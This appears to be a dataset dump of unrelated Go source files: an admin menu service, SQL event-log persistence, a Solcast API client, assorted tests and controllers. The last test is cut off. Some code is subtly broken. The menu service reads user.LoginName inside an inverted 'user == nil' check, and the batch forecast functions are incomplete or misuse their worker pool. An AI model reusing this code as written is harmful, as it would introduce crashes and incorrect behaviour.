text stringlengths 11 4.05M |
|---|
package menu
import (
"errors"
"github.com/gin-gonic/gin"
"strings"
"time"
"yj-app/app/model"
menuModel "yj-app/app/model/system/menu"
userService "yj-app/app/service/system/user"
cache "yj-app/app/yjgframe/cache"
"yj-app/app/yjgframe/utils/convert"
"yj-app/app/yjgframe/utils/gconv"
"yj-app/app/yjgframe/utils/page"
)
//根据主键查询数据
func SelectRecordById(id int64) (*menuModel.EntityExtend, error) {
return menuModel.SelectRecordById(id)
}
//根据条件查询数据
func SelectListAll(params *menuModel.SelectPageReq) ([]menuModel.Entity, error) {
return menuModel.SelectListAll(params)
}
//根据条件分页查询数据
func SelectListPage(params *menuModel.SelectPageReq) (*[]menuModel.Entity, *page.Paging, error) {
return menuModel.SelectListPage(params)
}
//根据主键删除数据
func DeleteRecordById(id int64) bool {
rs, err := (&menuModel.Entity{MenuId: id}).Delete()
if err == nil {
if rs > 0 {
return true
}
}
return false
}
//添加数据
func AddSave(req *menuModel.AddReq, c *gin.Context) (int64, error) {
var entity menuModel.Entity
entity.MenuName = req.MenuName
entity.Visible = req.Visible
entity.ParentId = req.ParentId
entity.Remark = ""
entity.MenuType = req.MenuType
entity.Url = req.Url
entity.Perms = req.Perms
entity.Target = req.Target
entity.Icon = req.Icon
entity.OrderNum = req.OrderNum
entity.CreateTime = time.Now()
entity.CreateBy = ""
user := userService.GetProfile(c)
if user == nil {
entity.CreateBy = user.LoginName
}
_, err := entity.Insert()
return entity.MenuId, err
}
//修改数据
func EditSave(req *menuModel.EditReq, c *gin.Context) (int64, error) {
entity := &menuModel.Entity{MenuId: req.MenuId}
ok, err := entity.FindOne()
if err != nil {
return 0, err
}
if !ok {
return 0, errors.New("角色不存在")
}
entity.MenuName = req.MenuName
entity.Visible = req.Visible
entity.ParentId = req.ParentId
entity.Remark = ""
entity.MenuType = req.MenuType
entity.Url = req.Url
entity.Perms = req.Perms
entity.Target = req.Target
entity.Icon = req.Icon
entity.OrderNum = req.OrderNum
entity.UpdateTime = time.Now()
entity.UpdateBy = ""
user := userService.GetProfile(c)
if user == nil {
entity.UpdateBy = user.LoginName
}
return entity.Update()
}
//批量删除数据记录
func DeleteRecordByIds(ids string) int64 {
idarr := convert.ToInt64Array(ids, ",")
result, err := menuModel.DeleteBatch(idarr...)
if err != nil {
return 0
}
return result
}
//加载所有菜单列表树
func MenuTreeData(userId int64) (*[]model.Ztree, error) {
var result *[]model.Ztree
menuList, err := SelectMenuNormalByUser(userId)
if err != nil {
return nil, err
}
result, err = InitZtree(menuList, nil, false)
if err != nil {
return nil, err
}
return result, nil
}
//获取用户的菜单数据
func SelectMenuNormalByUser(userId int64) (*[]menuModel.EntityExtend, error) {
if userService.IsAdmin(userId) {
return SelectMenuNormalAll()
} else {
return SelectMenusByUserId(gconv.String(userId))
}
}
//获取管理员菜单数据
func SelectMenuNormalAll() (*[]menuModel.EntityExtend, error) {
//从缓存读取
c := cache.Instance()
tmp, f := c.Get(model.MENU_CACHE)
if f && tmp != nil {
rs, ok := tmp.([]menuModel.EntityExtend)
if ok {
return &rs, nil
}
}
//从数据库中读取
var result []menuModel.EntityExtend
result, err := menuModel.SelectMenuNormalAll()
if err != nil {
return nil, err
}
for i := range result {
chilrens := getMenuChildPerms(result, result[i].MenuId)
for j := range chilrens {
chilrens2 := getMenuChildPerms(result, chilrens[j].MenuId)
chilrens[j].Children = chilrens2
if chilrens[j].Target == "" {
chilrens[j].Target = "menuItem"
}
if chilrens[j].Url == "" {
chilrens[j].Url = "#"
}
}
if chilrens != nil {
result[i].Children = chilrens
if result[i].ParentId != 0 {
if result[i].Target == "" {
result[i].Target = "menuItem"
}
if result[i].Url == "" {
result[i].Url = "#"
}
}
}
}
//存入缓存
cache.Instance().Set(model.MENU_CACHE, result, time.Hour)
return &result, nil
}
//根据用户ID读取菜单数据
func SelectMenusByUserId(userId string) (*[]menuModel.EntityExtend, error) {
//从缓存读取
tmp, have := cache.Instance().Get(model.MENU_CACHE + userId)
if have && tmp != nil {
rs, ok := tmp.([]menuModel.EntityExtend)
if ok {
return &rs, nil
}
}
//从数据库中读取
var result []menuModel.EntityExtend
result, err := menuModel.SelectMenusByUserId(userId)
if err != nil {
return nil, err
}
for i := range result {
chilrens := getMenuChildPerms(result, result[i].MenuId)
for j := range chilrens {
chilrens2 := getMenuChildPerms(result, chilrens[j].MenuId)
chilrens[j].Children = chilrens2
if chilrens[j].Target == "" {
chilrens[j].Target = "menuItem"
}
if chilrens[j].Url == "" {
chilrens[j].Url = "#"
}
}
if chilrens != nil {
result[i].Children = chilrens
if result[i].ParentId != 0 {
if result[i].Target == "" {
result[i].Target = "menuItem"
}
if result[i].Url == "" {
result[i].Url = "#"
}
} else {
if result[i].Url == "" || result[i].Url == "#" {
result[i].Target = ""
}
if result[i].Url == "" {
result[i].Url = "#"
}
}
}
}
//存入缓存
cache.Instance().Set(model.MENU_CACHE+userId, result, time.Hour)
return &result, nil
}
//根据父id获取子菜单
func getMenuChildPerms(menus []menuModel.EntityExtend, parentId int64) []menuModel.EntityExtend {
if menus == nil {
return nil
}
var result []menuModel.EntityExtend
//得到一级菜单
for i := range menus {
if menus[i].ParentId == parentId && (menus[i].MenuType == "M" || menus[i].MenuType == "C") {
if menus[i].Target == "" {
menus[i].Target = "menuItem"
}
if menus[i].Url == "" {
menus[i].Url = "#"
}
result = append(result, menus[i])
}
}
return result
}
//检查菜单名是否唯一
func CheckMenuNameUniqueAll(menuName string, parentId int64) string {
entity, err := menuModel.CheckMenuNameUniqueAll(menuName, parentId)
if err != nil {
return "1"
}
if entity != nil && entity.MenuId > 0 {
return "1"
}
return "0"
}
//检查菜单名是否唯一
func CheckMenuNameUnique(menuName string, menuId, parentId int64) string {
entity, err := menuModel.CheckMenuNameUniqueAll(menuName, parentId)
if err != nil {
return "1"
}
if entity != nil && entity.MenuId > 0 && entity.MenuId != menuId {
return "1"
}
return "0"
}
//检查权限键是否唯一
func CheckPermsUniqueAll(perms string) string {
entity, err := menuModel.CheckPermsUniqueAll(perms)
if err != nil {
return "1"
}
if entity != nil && entity.MenuId > 0 {
return "1"
}
return "0"
}
//检查权限键是否唯一
func CheckPermsUnique(perms string, menuId int64) string {
entity, err := menuModel.CheckPermsUniqueAll(perms)
if err != nil {
return "1"
}
if entity != nil && entity.MenuId > 0 && entity.MenuId != menuId {
return "1"
}
return "0"
}
//根据角色ID查询菜单
func RoleMenuTreeData(roleId, userId int64) (*[]model.Ztree, error) {
var result *[]model.Ztree
menuList, err := SelectMenuNormalByUser(userId)
if err != nil {
return nil, err
}
if roleId > 0 {
roleMenuList, err := menuModel.SelectMenuTree(roleId)
if err != nil || roleMenuList == nil {
result, err = InitZtree(menuList, nil, true)
} else {
result, err = InitZtree(menuList, &roleMenuList, true)
}
} else {
result, err = InitZtree(menuList, nil, true)
}
return result, nil
}
//对象转菜单树
func InitZtree(menuList *[]menuModel.EntityExtend, roleMenuList *[]string, permsFlag bool) (*[]model.Ztree, error) {
var result []model.Ztree
isCheck := false
if roleMenuList != nil && len(*roleMenuList) > 0 {
isCheck = true
}
for _, obj := range *menuList {
var ztree model.Ztree
ztree.Title = obj.MenuName
ztree.Id = obj.MenuId
ztree.Name = transMenuName(obj.MenuName, permsFlag)
ztree.Pid = obj.ParentId
if isCheck {
tmp := gconv.String(obj.MenuId) + obj.Perms
tmpcheck := false
for j := range *roleMenuList {
if strings.Compare((*roleMenuList)[j], tmp) == 0 {
tmpcheck = true
break
}
}
ztree.Checked = tmpcheck
}
result = append(result, ztree)
}
return &result, nil
}
func transMenuName(menuName string, permsFlag bool) string {
if permsFlag {
return "<font color=\"#888\"> " + menuName + "</font>"
} else {
return menuName
}
}
|
package quicksort
import (
"testing"
)
func TestPartition(t *testing.T) {
a := []int{1, 2, 5, 4, 3}
t.Log(partition(a, 0, len(a)-1))
}
func TestSort(t *testing.T) {
a := []int{2, 8, 7, 1, 3, 5, 6, 4}
sort(a, 0, len(a)-1)
t.Log(a)
}
func Benchmark1(b *testing.B) {
a := []int{1, 2, 3, 4, 5, 6, 7, 8}
for i := 0; i < b.N; i++ {
sort(a, 0, len(a)-1)
}
}
func Benchmark2(b *testing.B) {
a := []int{2, 8, 7, 1, 3, 5, 6, 4}
for i := 0; i < b.N; i++ {
sort(a, 0, len(a)-1)
}
}
func Benchmark3(b *testing.B) {
a := []int{9, 8, 7, 6, 5, 4, 3, 2}
for i := 0; i < b.N; i++ {
sort(a, 0, len(a)-1)
}
}
|
package controllers
import "github.com/astaxie/beego"
type ErrorController struct {
IndexController
}
func (c *ErrorController) Error404() {
c.Data["Path"] = c.Ctx.Request.RequestURI
c.TplName = "error/404.html"
}
func (c *ErrorController) Error500() {
c.Data["Title"] = "500 Internal Server Error"
c.Data["Info"] = "服务器娘你在干嘛,不要停下来啊"
c.TplName = "error/error.html"
}
func (c *ErrorController) Error503() {
c.Data["Title"] = "503 Service Unavailable"
c.Data["Info"] = "唔,服务器娘现在忙不过来啦,请稍后尝试QAQ"
c.TplName = "error/error.html"
}
func (c *ErrorController) Error403() {
c.Data["Title"] = "403 Forbidden"
c.Data["Info"] = "服务器娘正在维护或者其他原因无法访问QAQ"
c.TplName = "error/error.html"
}
func CheckError(err error) bool {
if err != nil {
beego.Error(err)
return true
}else{
return false
}
} |
package persistence
import (
"database/sql"
"encoding/json"
"fmt"
"time"
"github.com/dollarshaveclub/acyl/pkg/models"
"github.com/dollarshaveclub/metahelm/pkg/metahelm"
"github.com/google/uuid"
"github.com/lib/pq"
"github.com/pkg/errors"
)
// GetEventLogByID returns a single EventLog by id, or nil or error
func (pg *PGLayer) GetEventLogByID(id uuid.UUID) (*models.EventLog, error) {
out := &models.EventLog{}
q := `SELECT ` + out.Columns() + ` FROM event_logs WHERE id = $1;`
if err := pg.db.QueryRow(q, id).Scan(out.ScanValues()...); err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, errors.Wrap(err, "error getting event log by id")
}
return out, nil
}
func (pg *PGLayer) GetEventLogByDeliveryID(deliveryID uuid.UUID) (*models.EventLog, error) {
out := &models.EventLog{}
q := `SELECT ` + out.Columns() + ` FROM event_logs WHERE github_delivery_id = $1;`
if err := pg.db.QueryRow(q, deliveryID).Scan(out.ScanValues()...); err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, errors.Wrap(err, "error getting event log by delivery id")
}
return out, nil
}
// GetEventLogsByEnvName gets all EventLogs associated with an environment
func (pg *PGLayer) GetEventLogsByEnvName(name string) ([]models.EventLog, error) {
q := `SELECT qa_environment_event_ids.event_id, ` + models.EventLog{}.ColumnsWithoutID() + ` FROM (
SELECT unnest(event_ids) AS event_id FROM qa_environments WHERE name = $1
) AS qa_environment_event_ids
JOIN event_logs ON qa_environment_event_ids.event_id = event_logs.id`
return collectEventLogRows(pg.db.Query(q, name))
}
// GetEventLogsByRepoAndPR gets all EventLogs associated with a repo and PR, sorted in reverse created order (newest first)
func (pg *PGLayer) GetEventLogsByRepoAndPR(repo string, pr uint) ([]models.EventLog, error) {
q := `SELECT ` + models.EventLog{}.Columns() + ` FROM event_logs WHERE repo = $1 AND pull_request = $2 ORDER BY created DESC;`
return collectEventLogRows(pg.db.Query(q, repo, pr))
}
// CreateEventLog creates a new EventLog. If elog.EnvName is an empty string, null will be persisted in the database for that column.
func (pg *PGLayer) CreateEventLog(elog *models.EventLog) error {
if elog.LogKey == uuid.Nil {
lk, err := uuid.NewRandom()
if err != nil {
return errors.Wrap(err, "error generating log key")
}
elog.LogKey = lk
}
q := `INSERT INTO event_logs (` + elog.InsertColumns() + `) VALUES (` + elog.InsertParams() + `);`
_, err := pg.db.Exec(q, elog.InsertValues()...)
return errors.Wrap(err, "error inserting event log")
}
// AppendToEventLog appends a new log line to an EventLog
func (pg *PGLayer) AppendToEventLog(id uuid.UUID, msg string) error {
q := `UPDATE event_logs SET log = array_append(log, $1) WHERE id = $2;`
_, err := pg.db.Exec(q, msg, id)
return errors.Wrap(err, "error appending to event log")
}
// SetEventLogEnvName sets the env name for an EventLog
// The name must be valid and exist in qa_environments or the foreign key will cause this method to return an error
func (pg *PGLayer) SetEventLogEnvName(id uuid.UUID, name string) error {
tx, err := pg.db.Begin()
if err != nil {
return errors.Wrap(err, "error beginning transaction")
}
defer tx.Rollback()
q := `UPDATE event_logs SET env_name = $1 WHERE id = $2;`
if _, err := tx.Exec(q, name, id); err != nil {
return errors.Wrap(err, "error setting eventlog env name")
}
q = `UPDATE qa_environments SET event_ids = event_ids || $1::uuid WHERE name = $2 AND NOT $1::uuid = ANY(event_ids);`
if _, err := tx.Exec(q, id, name); err != nil {
return errors.Wrap(err, "error setting environment event IDs")
}
if err := tx.Commit(); err != nil {
return errors.Wrap(err, "error committing transaction")
}
return nil
}
// DeleteEventLog deletes an EventLog
func (pg *PGLayer) DeleteEventLog(id uuid.UUID) error {
q := `DELETE FROM event_logs WHERE id = $1;`
_, err := pg.db.Exec(q, id)
return errors.Wrap(err, "error deleting event log")
}
// DeleteEventLogsByEnvName deletes all EventLogs associated with an environment and returns the number of EventLogs deleted, or error
func (pg *PGLayer) DeleteEventLogsByEnvName(name string) (uint, error) {
q := `DELETE FROM event_logs WHERE env_name = $1;`
res, err := pg.db.Exec(q, name)
n, _ := res.RowsAffected()
return uint(n), errors.Wrap(err, "error deleting event logs by env name")
}
// DeleteEventLogsByRepoAndPR deletes all EventLogs associated with a repo and PR and returns the number of EventLogs deleted, or error
func (pg *PGLayer) DeleteEventLogsByRepoAndPR(repo string, pr uint) (uint, error) {
q := `DELETE FROM event_logs WHERE repo = $1 AND pull_request = $2;`
res, err := pg.db.Exec(q, repo, pr)
n, _ := res.RowsAffected()
return uint(n), errors.Wrap(err, "error deleting event logs by repo and pr")
}
func collectEventLogRows(rows *sql.Rows, err error) ([]models.EventLog, error) {
var logs []models.EventLog
if err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, errors.Wrapf(err, "error querying")
}
defer rows.Close()
for rows.Next() {
el := models.EventLog{}
if err := rows.Scan(el.ScanValues()...); err != nil {
return nil, errors.Wrap(err, "error scanning row")
}
logs = append(logs, el)
}
return logs, nil
}
func JSONTime(t time.Time) string {
return t.Format("2006-01-02T15:04:05Z07:00")
}
func (pg *PGLayer) SetEventStatus(id uuid.UUID, status models.EventStatusSummary) error {
q := `UPDATE event_logs SET status = $1 WHERE id = $2;`
_, err := pg.db.Exec(q, status, id)
return errors.Wrap(err, "error setting event status")
}
func (pg *PGLayer) SetEventStatusConfig(id uuid.UUID, processingTime time.Duration, refmap map[string]string) error {
if len(refmap) == 0 {
return errors.New("refmap cannot be empty")
}
rj, err := json.Marshal(&refmap)
if err != nil {
return errors.Wrap(err, "error marshaling refmap")
}
ptj, err := json.Marshal(&models.ConfigProcessingDuration{Duration: processingTime})
if err != nil {
return errors.Wrap(err, "error marshaling processingTime")
}
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('processing_time', $1::text, 'ref_map', $2::jsonb)::jsonb)
WHERE id = $3;`
_, err = pg.db.Exec(q, string(ptj), string(rj), id)
return errors.Wrap(err, "error setting event status config")
}
func (pg *PGLayer) SetEventStatusConfigK8sNS(id uuid.UUID, ns string) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('k8s_ns', $1::text)::jsonb)
WHERE id = $2;`
_, err := pg.db.Exec(q, ns, id)
return errors.Wrap(err, "error setting event status config k8s namespace")
}
func (pg *PGLayer) SetEventStatusRenderedStatus(id uuid.UUID, rstatus models.RenderedEventStatus) error {
j, err := json.Marshal(rstatus)
if err != nil {
return errors.Wrap(err, "error marshaling rendered event status")
}
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config,rendered_status}', $1::jsonb)
WHERE id = $2;`
_, err = pg.db.Exec(q, string(j), id)
return errors.Wrap(err, "error setting event status rendered status")
}
func (pg *PGLayer) SetEventStatusTree(id uuid.UUID, tree map[string]models.EventStatusTreeNode) error {
if len(tree) == 0 {
return errors.New("tree cannot be empty")
}
tj, err := json.Marshal(&tree)
if err != nil {
return errors.Wrap(err, "error marshaling tree")
}
q := `UPDATE event_logs SET
status = jsonb_set(status, '{tree}', $1::jsonb)
WHERE id = $2;`
_, err = pg.db.Exec(q, string(tj), id)
return errors.Wrap(err, "error setting event status tree")
}
func (pg *PGLayer) SetEventStatusCompleted(id uuid.UUID, configStatus models.EventStatus) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('status', $1::int, 'completed', $2::text)::jsonb)
WHERE id = $3;`
_, err := pg.db.Exec(q, configStatus, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status config status to completed")
}
// SetEventStatusFailed will set the event status to indicate that it has failed and will persist the ChartError.
func (pg *PGLayer) SetEventStatusFailed(id uuid.UUID, ce metahelm.ChartError) error {
encodedChartErr, err := json.Marshal(ce)
if err != nil {
return errors.Wrap(err, "error marshaling chart error")
}
status := models.FailedStatus
q := `UPDATE event_logs SET
status = jsonb_set(status, '{config}', status->'config' || json_build_object('status', $1::int, 'completed', $2::text, 'failed_resources', $4::jsonb)::jsonb)
WHERE id = $3;`
_, err = pg.db.Exec(q, status, JSONTime(time.Now().UTC()), id, encodedChartErr)
return errors.Wrap(err, "error setting event status config status to failed")
}
func (pg *PGLayer) SetEventStatusImageStarted(id uuid.UUID, name string) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'image'], status->'tree'->$1->'image' || json_build_object('started', $2::text)::jsonb)
WHERE id = $3;`
_, err := pg.db.Exec(q, name, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status image to started")
}
func (pg *PGLayer) SetEventStatusImageCompleted(id uuid.UUID, name string, err bool) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'image'], status->'tree'->$1->'image' || json_build_object('completed', $3::text, 'error', $2::boolean)::jsonb)
WHERE id = $4;`
_, err2 := pg.db.Exec(q, name, err, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err2, "error setting event status image status to completed")
}
func (pg *PGLayer) SetEventStatusChartStarted(id uuid.UUID, name string, status models.NodeChartStatus) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'chart'], status->'tree'->$1->'chart' || json_build_object('status', $2::int, 'started', $3::text)::jsonb)
WHERE id = $4;`
_, err := pg.db.Exec(q, name, status, JSONTime(time.Now().UTC()), id)
return errors.Wrap(err, "error setting event status chart status to started")
}
func (pg *PGLayer) SetEventStatusChartCompleted(id uuid.UUID, name string, status models.NodeChartStatus) error {
q := `UPDATE event_logs SET
status = jsonb_set(status, ARRAY['tree',$1,'chart'], status->'tree'->$1->'chart' || json_build_object('status', $2::int, 'completed', $3::text)::jsonb)
WHERE id = $4;`
_, err := pg.db.Exec(q, name, status, JSONTime(time.Now().UTC()), id)
if err != nil {
perr := err.(*pq.Error)
fmt.Printf("perr: %v\n", perr.Detail)
}
return errors.Wrap(err, "error setting event status chart status to completed")
}
func (pg *PGLayer) GetEventStatus(id uuid.UUID) (*models.EventStatusSummary, error) {
out := &models.EventStatusSummary{}
q := `SELECT status FROM event_logs WHERE id = $1;`
if err := pg.db.QueryRow(q, id).Scan(&out); err != nil {
if err == sql.ErrNoRows {
return nil, nil
}
return nil, errors.Wrap(err, "error getting event status by id")
}
return out, nil
}
|
package query
import (
"github.com/gin-gonic/gin"
"sub_account_service/number_server/routers/query/api"
)
func InitRouter() *gin.Engine {
r := gin.New()
r.Use(gin.Logger())
r.Use(gin.Recovery())
r.GET("/orders/batch", api.BatchGetOrderList)
r.GET("/getLatestVersion", api.GetLatestVersion)
return r
}
|
package keeper
import (
"github.com/BitCannaGlobal/testnet-bcna-cosmos/x/bcna/types"
)
var _ types.QueryServer = Keeper{}
|
package solcast
import (
datatypes "github.com/Siliconrob/solcast-go/solcast/types"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"math"
"net/http"
"strconv"
"time"
"github.com/jimlawless/whereami"
"github.com/google/go-querystring/query"
"github.com/pkg/errors"
"github.com/vardius/worker-pool"
"runtime"
"sync"
)
type HttpResponse struct {
url string
response *http.Response
err error
}
func round(num float64) int {
return int(num + math.Copysign(0.5, num))
}
func toFixed(num float64, precision int) float64 {
output := math.Pow(10, float64(precision))
return float64(round(num*output)) / output
}
func toString(num float64, precision int) string {
result := strconv.FormatFloat(toFixed(num, precision), 'f', precision, 64)
return result
}
func textAsInt(inputText string) int64 {
if inputText == "" {
return 0
}
value, err := strconv.ParseInt(inputText, 10, 64)
if err != nil {
panic(err)
}
return value
}
func getApiRateLimits(resp *http.Response) ApiLimits {
results := ApiLimits{}
if resp.StatusCode != 429 {
return results
}
results.Limit = textAsInt(resp.Header.Get("x-rate-limit"))
results.Remaining = textAsInt(resp.Header.Get("x-rate-limit-remaining"))
parsedTime := textAsInt(resp.Header.Get("x-rate-limit-reset"))
if parsedTime > 0 {
results.ResetTime = time.Unix(parsedTime, 0)
}
return results
}
func getData(url string) ([]byte, error) {
netClient := &http.Client{
Timeout: time.Minute * 5,
}
resp, err := netClient.Get(url)
if err != nil {
log.Printf("Unable to create HTTP client %v", whereami.WhereAmI())
panic(err)
}
if resp.StatusCode >= 500 && resp.StatusCode < 600 {
log.Printf("Solcast API error, post to GitHub or here https://forums.solcast.com.au/ please %v", whereami.WhereAmI())
panic(err)
}
if resp.StatusCode >= 400 && resp.StatusCode < 500 {
if resp.StatusCode == 429 {
limits := getApiRateLimits(resp)
log.Printf("Request rate limit exceeded please wait and try again %v %v", limits, whereami.WhereAmI())
return []byte{}, errors.New(fmt.Sprintf("Retry request at %v", limits.ResetTime))
}
log.Printf("Bad request, check your inputs %v", whereami.WhereAmI())
panic(err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
log.Printf("Failure to read the HTTP body %v", whereami.WhereAmI())
panic(err)
}
return body, nil
}
func powerEstimatedActuals(location datatypes.PowerLatLng, config Config) datatypes.PowerEstimatedActualsResponse {
results := datatypes.PowerEstimatedActualsResponse{}
queryParams := &datatypes.PowerQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
Capacity: location.Capacity,
}
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/pv_power/estimated_actuals?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
func PowerEstimatedActualsWithKey(location datatypes.PowerLatLng, apiKey string) datatypes.PowerEstimatedActualsResponse {
config := Read()
config.APIKey = apiKey
return powerEstimatedActuals(location, config)
}
func PowerEstimatedActuals(location datatypes.PowerLatLng) datatypes.PowerEstimatedActualsResponse {
return powerEstimatedActuals(location, Read())
}
func radiationEstimatedActuals(location datatypes.LatLng, config Config) datatypes.RadiationEstimatedActualsResponse {
results := datatypes.RadiationEstimatedActualsResponse{}
queryParams := &datatypes.RadiationQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
}
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/radiation/estimated_actuals?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
func RadiationEstimatedActualsWithKey(location datatypes.LatLng, apiKey string) datatypes.RadiationEstimatedActualsResponse {
config := Read()
config.APIKey = apiKey
return radiationEstimatedActuals(location, config)
}
func RadiationEstimatedActuals(location datatypes.LatLng) datatypes.RadiationEstimatedActualsResponse {
return radiationEstimatedActuals(location, Read())
}
func powerForecast(location datatypes.PowerLatLng, config Config) datatypes.PowerForecastsResponse {
results := datatypes.PowerForecastsResponse{}
queryParams := &datatypes.PowerQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
Capacity: location.Capacity,
}
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/pv_power/forecasts?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
func PowerForecast(location datatypes.PowerLatLng) datatypes.PowerForecastsResponse {
return powerForecast(location, Read())
}
func PowerForecastWithKey(location datatypes.PowerLatLng, apiKey string) datatypes.PowerForecastsResponse {
config := Read()
config.APIKey = apiKey
return powerForecast(location, config)
}
func radiationForecast(location datatypes.LatLng, config Config) datatypes.RadiationForecastsResponse {
results := datatypes.RadiationForecastsResponse{}
queryParams := &datatypes.RadiationQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
}
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/radiation/forecasts?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
func RadiationForecastWithKey(location datatypes.LatLng, apiKey string) datatypes.RadiationForecastsResponse {
config := Read()
config.APIKey = apiKey
return radiationForecast(location, config)
}
func RadiationForecast(location datatypes.LatLng) datatypes.RadiationForecastsResponse {
return radiationForecast(location, Read())
}
func batchRadiationForecast(locations[] datatypes.LatLng, config Config) []datatypes.RadiationForecastsResponse {
var wg sync.WaitGroup
toDo := len(locations)
workersAmount := runtime.NumCPU()
// create new pool
pool := workerpool.New(runtime.NumCPU())
out := make(chan datatypes.LatLng, toDo)
pool.Start(workersAmount, func(location datatypes.LatLng) {
defer wg.Done()
out <- location
})
wg.Add(workersAmount)
for i := 0; i < toDo; i++ {
pool.Delegate(i)
}
go func() {
// stop all workers after jobs are done
wg.Wait()
close(out)
pool.Stop()
}()
var results []datatypes.RadiationForecastsResponse
for location := range out {
results = append(results, radiationForecast(location, config))
}
return results
}
func BatchRadiationForecast(locations[] datatypes.LatLng) []datatypes.RadiationForecastsResponse {
return batchRadiationForecast(locations, Read())
}
func BatchRadiationForecastWithKey(locations[] datatypes.LatLng, apiKey string) []datatypes.RadiationForecastsResponse {
config := Read()
config.APIKey = apiKey
return batchRadiationForecast(locations, config)
}
func batchPowerForecast(locations[] datatypes.PowerLatLng, config Config) []datatypes.PowerForecastsResponse {
return nil
}
func BatchPowerForecast(locations[] datatypes.PowerLatLng) []datatypes.PowerForecastsResponse {
return batchPowerForecast(locations, Read())
}
func BatchPowerForecastWithKey(locations[] datatypes.PowerLatLng, apiKey string) []datatypes.PowerForecastsResponse {
config := Read()
config.APIKey = apiKey
return batchPowerForecast(locations, config)
} |
package constant
const SPIDE_URL string = "go.config.url"
const SPIDE_KEYWORD string = "go.config.keyword"
const SPIDE_PAGE_SIZE string = "go.config.pageSize"
const SPIDE_SAVE_PATH string = "go.config.savePath"
func main() {
}
|
package coredb
import (
"testing"
"go.uber.org/zap/zapcore"
jarvisbase "github.com/zhs007/jarviscore/base"
)
func TestBackup06(t *testing.T) {
jarvisbase.InitLogger(zapcore.DebugLevel, true, "", "")
//------------------------------------------------------------------------
// initial CoreDB
cdb, err := NewCoreDB("../test/backup-v0.6", "", "leveldb", nil)
if err != nil {
t.Fatalf("TestBackup06 NewCoreDB err! %v", err)
return
}
err = cdb.Init()
if err != nil {
t.Fatalf("TestBackup06 Init err! %v", err)
return
}
if cdb.GetPrivateKey().ToAddress() != "13VHbRCxFsiFk6qmVZjkDGXHzEJ553yMHd" {
t.Fatalf("TestBackup06 GetPrivateKey err! (%v - %v)", cdb.GetPrivateKey().ToAddress(), "13VHbRCxFsiFk6qmVZjkDGXHzEJ553yMHd")
return
}
numsNode := cdb.CountNodeNums()
if numsNode != 30 {
t.Fatalf("TestBackup06 CountNodeNums err! (%v - %v)", numsNode, 30)
return
}
t.Logf("TestBackup06 is OK")
}
|
package main
import (
"bufio"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
var message = `/KFM5KAIFA-METER
1-3:0.2.8(42)
0-0:1.0.0(160525205154S)
0-0:96.1.1(1234567890)
1-0:1.8.1(000001.117*kWh)
1-0:1.8.2(000004.491*kWh)
1-0:2.8.1(000000.000*kWh)
1-0:2.8.2(000000.000*kWh)
0-0:96.14.0(0002)
1-0:1.7.0(00.563*kW)
1-0:2.7.0(00.000*kW)
0-0:96.7.21(00001)
0-0:96.7.9(00001)
1-0:99.97.0(1)(0-0:96.7.19)(000101000001W)(2147483647*s)
1-0:32.32.0(00000)
1-0:32.36.0(00000)
0-0:96.13.1()
0-0:96.13.0()
1-0:31.7.0(004*A)
1-0:21.7.0(00.563*kW)
1-0:22.7.0(00.000*kW)
0-1:24.1.0(003)
0-1:96.1.0(4730303139333430323839323633363136)
0-1:24.2.1(160525200000S)(00000.866*m3)
!D57B`
func TestTelegram(t *testing.T) {
telegram := &Telegram{}
telegram.UnmarshalBinary([]byte(message))
assert.Equal(t, telegram.EquipmentId, 1234567890, "")
assert.Equal(t, telegram.PowerUsedLowTariff, 1.117, "")
assert.Equal(t, telegram.PowerUsedNormalTariff, 4.491, "")
assert.Equal(t, telegram.CurrentPowerUsage, 0.563, "")
